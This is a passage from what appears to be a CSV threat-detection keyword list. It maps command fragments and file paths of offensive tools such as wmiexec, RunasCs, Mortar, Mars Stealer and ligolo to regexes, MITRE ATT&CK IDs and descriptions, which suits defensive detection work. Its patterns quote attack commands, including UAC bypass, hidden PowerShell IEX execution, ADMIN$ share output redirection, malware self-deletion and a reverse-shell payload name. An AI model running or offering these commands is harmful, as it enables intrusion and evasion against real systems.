- TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*cloudmapper configure discover-organization-accounts*",".{0,1000}cloudmapper\sconfigure\sdiscover\-organization\-accounts.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*cloudsplaining create-multi-account-config-file -o accounts.yml*",".{0,1000}cloudsplaining\screate\-multi\-account\-config\-file\s\-o\saccounts\.yml.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*cloudsplaining download --profile someprofile*",".{0,1000}cloudsplaining\sdownload\s\-\-profile\ssomeprofile.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*cloudsplaining scan --input-file default.json*",".{0,1000}cloudsplaining\sscan\s\-\-input\-file\sdefault\.json.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*cloudsplaining scan-multi-account -c accounts.yml -r TargetRole --output-directory ./*",".{0,1000}cloudsplaining\sscan\-multi\-account\s\-c\saccounts\.yml\s\-r\sTargetRole\s\-\-output\-directory\s\.\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*cloudsplaining scan-policy-file --input-file examples/policies/wildcards.json*",".{0,1000}cloudsplaining\sscan\-policy\-file\s\-\-input\-file\sexamples\/policies\/wildcards\.json.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*cloudsploit *",".{0,1000}cloudsploit\s.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","0","N/A","N/A","10","3180","651","2024-05-01T18:06:46Z","2015-06-29T15:33:40Z" "*cloudsploit*cloudtrail*",".{0,1000}cloudsploit.{0,1000}cloudtrail.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","3180","651","2024-05-01T18:06:46Z","2015-06-29T15:33:40Z" "*cloudsploit/index.js*",".{0,1000}cloudsploit\/index\.js.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","3180","651","2024-05-01T18:06:46Z","2015-06-29T15:33:40Z" "*cloudsploit/scans*",".{0,1000}cloudsploit\/scans.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","3180","651","2024-05-01T18:06:46Z","2015-06-29T15:33:40Z" "*CloudSploitSupplemental*",".{0,1000}CloudSploitSupplemental.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","3180","651","2024-05-01T18:06:46Z","2015-06-29T15:33:40Z" "*cloudtrail__csv_injection*",".{0,1000}cloudtrail__csv_injection.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*clr2of8/GatherContacts*",".{0,1000}clr2of8\/GatherContacts.{0,1000}","offensive_tool_keyword","GatherContacts","A Burp Suite Extension to pull Employee Names from Google and Bing LinkedIn Search Results.As part of reconnaissance when performing a penetration test. it is often useful to gather employee names that can then be massaged into email addresses and usernames. The usernames may come in handy for performing a password spraying attack for example. One easy way to gather employee names is to use the following Burp Suite Pro extension as described below.","T1593 - T1533 - T1087","TA0043 - TA0002","N/A","N/A","Information Gathering","https://github.com/clr2of8/GatherContacts","1","1","N/A","N/A","2","178","44","2022-08-27T13:28:08Z","2018-03-29T14:46:14Z" "*cmars/onionpipe*",".{0,1000}cmars\/onionpipe.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*cmbndhnoonmghfofefkcccljbkdpamhi_14678.crx*",".{0,1000}cmbndhnoonmghfofefkcccljbkdpamhi_14678\.crx.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5452","618","2024-02-24T00:10:34Z","2020-06-22T21:42:16Z" "*cmd /c * --bypass-uac*",".{0,1000}cmd\s\/c\s.{0,1000}\s\-\-bypass\-uac.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","0","N/A","6","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*cmd /c * --remote-impersonation*",".{0,1000}cmd\s\/c\s.{0,1000}\s\-\-remote\-impersonation.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","0","N/A","6","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*cmd /c *if exist *.txt echo ImHere*",".{0,1000}cmd\s\/c\s.{0,1000}if\sexist\s.{0,1000}\.txt\secho\sImHere.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1687","337","2024-01-31T23:23:38Z","2015-03-16T13:15:00Z" "*cmd /c mklink /d * HarddiskVolumeShadowCopy1*",".{0,1000}cmd\s\/c\smklink\s\/d\s.{0,1000}\sHarddiskVolumeShadowCopy1.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","4167","582","2024-04-29T07:48:05Z","2019-05-28T10:53:00Z" "*cmd /c whoami* bypass*",".{0,1000}cmd\s\/c\swhoami.{0,1000}\sbypass.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "*cmd smb *-u*-p*",".{0,1000}cmd\ssmb\s.{0,1000}\-u.{0,1000}\-p.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*cmd.cat/chattr*",".{0,1000}cmd\.cat\/chattr.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6697","1259","2024-04-15T18:31:30Z","2019-03-26T22:36:32Z" "*cmd.exe /c *echo test > C:\Users\Public\test.txt*",".{0,1000}cmd\.exe\s\/c\s.{0,1000}echo\stest\s\>\sC\:\\Users\\Public\\test\.txt.{0,1000}","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","0","N/A","N/A","4","357","39","2023-12-12T06:59:59Z","2023-04-21T19:46:53Z" "*cmd.exe /c powershell -command ""Get-Service *chopper*",".{0,1000}cmd\.exe\s\/c\spowershell\s\-command\s\""Get\-Service\s.{0,1000}chopper.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*cmd.exe /c rundll32.exe agressor.dll*stealth*",".{0,1000}cmd\.exe\s\/c\srundll32\.exe\sagressor\.dll.{0,1000}stealth.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*cmd.exe /c sc start plumber*",".{0,1000}cmd\.exe\s\/c\ssc\sstart\splumber.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*cmd.exe /c timeout /t 5 & del /f /q *%s* & exit*",".{0,1000}cmd\.exe\s\/c\stimeout\s\/t\s5\s\&\sdel\s\/f\s\/q\s.{0,1000}\%s.{0,1000}\s\&\sexit.{0,1000}","offensive_tool_keyword","mars stealer","Self-removal 'mars stealer' command","T1587","TA0002","mars stealer","","Malware","https://3xp0rt.com/posts/mars-stealer","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*cmd.exe /c zoom1.msi*",".{0,1000}cmd\.exe\s\/c\szoom1\.msi.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","7","10","N/A","N/A","N/A","N/A" "*cmd.exe /Q /c *.bat *> \\127.0.0.1\ADMIN$\* 2&*",".{0,1000}cmd\.exe\s\/Q\s\/c\s.{0,1000}\.bat\s.{0,1000}\>\s\\\\127\.0\.0\.1\\ADMIN\$\\.{0,1000}\s2\&.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cmd.exe /Q /c /start /min powershell.exe -nop -c*",".{0,1000}cmd\.exe\s\/Q\s\/c\s\/start\s\/min\spowershell\.exe\s\-nop\s\-c.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__* 2>&1*",".{0,1000}cmd\.exe\s\/Q\s\/c\scd\s\\\s1\>\s\\\\127\.0\.0\.1\\ADMIN\$\\__.{0,1000}\s2\>\&1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*cmd.exe /Q /c dir 1> \\127.0.0.1\ADMIN$\_* 2>&1*",".{0,1000}cmd\.exe\s\/Q\s\/c\sdir\s1\>\s\\\\127\.0\.0\.1\\ADMIN\$\\_.{0,1000}\s2\>\&1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*cmd.exe /Q /c dir 1> \\localhost\ADMIN$\Temp\* 2>&1*",".{0,1000}cmd\.exe\s\/Q\s\/c\sdir\s1\>\s\\\\localhost\\ADMIN\$\\Temp\\.{0,1000}\s2\>\&1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*cmd.exe /Q /c hostname1> *\\127.0.0.1\ADMIN$\* 2>*",".{0,1000}cmd\.exe\s\/Q\s\/c\shostname1\>\s.{0,1000}\\\\127\.0\.0\.1\\ADMIN\$\\.{0,1000}\s2\>.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cmd.exe /Q /c nslookup 1> *\\127.0.0.1\ADMIN$\* 2>*",".{0,1000}cmd\.exe\s\/Q\s\/c\snslookup\s1\>\s.{0,1000}\\\\127\.0\.0\.1\\ADMIN\$\\.{0,1000}\s2\>.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cmd.exe /Q /c powershell.exe -nop -w -hidden -c*IEX*",".{0,1000}cmd\.exe\s\/Q\s\/c\spowershell\.exe\s\-nop\s\-w\s\-hidden\s\-c.{0,1000}IEX.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cmd.exe /Q /c powershelll.exe 1> *\\127.0.0.1\ADMIN$\* 2>*",".{0,1000}cmd\.exe\s\/Q\s\/c\spowershelll\.exe\s1\>\s.{0,1000}\\\\127\.0\.0\.1\\ADMIN\$\\.{0,1000}\s2\>.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cmd.exe /Q /c quser 1 > \\127.0.0.1\ADMIN$\*",".{0,1000}cmd\.exe\s\/Q\s\/c\squser\s1\s\>\s\\\\127\.0\.0\.1\\ADMIN\$\\.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cmd.exe /Q /c start *stage1.exe 1*",".{0,1000}cmd\.exe\s\/Q\s\/c\sstart\s.{0,1000}stage1\.exe\s1.{0,1000}","offensive_tool_keyword","malware","Destructive Malware targeting organizations","T1486 T1059","TA0008","N/A","N/A","Ransomware","https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*cmd/backdoor.go*",".{0,1000}cmd\/backdoor\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*cmd/bruteforce.go*",".{0,1000}cmd\/bruteforce\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*cmd/bruteuser.go*",".{0,1000}cmd\/bruteuser\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*cmd/kubestroyer*",".{0,1000}cmd\/kubestroyer.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/Rolix44/Kubestroyer","1","0","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*cmd/ligolo*",".{0,1000}cmd\/ligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*cmd/ligolo*",".{0,1000}cmd\/ligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*cmd/localrelay*",".{0,1000}cmd\/localrelay.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*cmd/merlinagent/*",".{0,1000}cmd\/merlinagent\/.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*cmd/merlinagentdll/*",".{0,1000}cmd\/merlinagentdll\/.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*cmd/merlinagentdll/*",".{0,1000}cmd\/merlinagentdll\/.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*cmd/setuid.go*",".{0,1000}cmd\/setuid\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*cmd/unix/reverse_bash*",".{0,1000}cmd\/unix\/reverse_bash.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 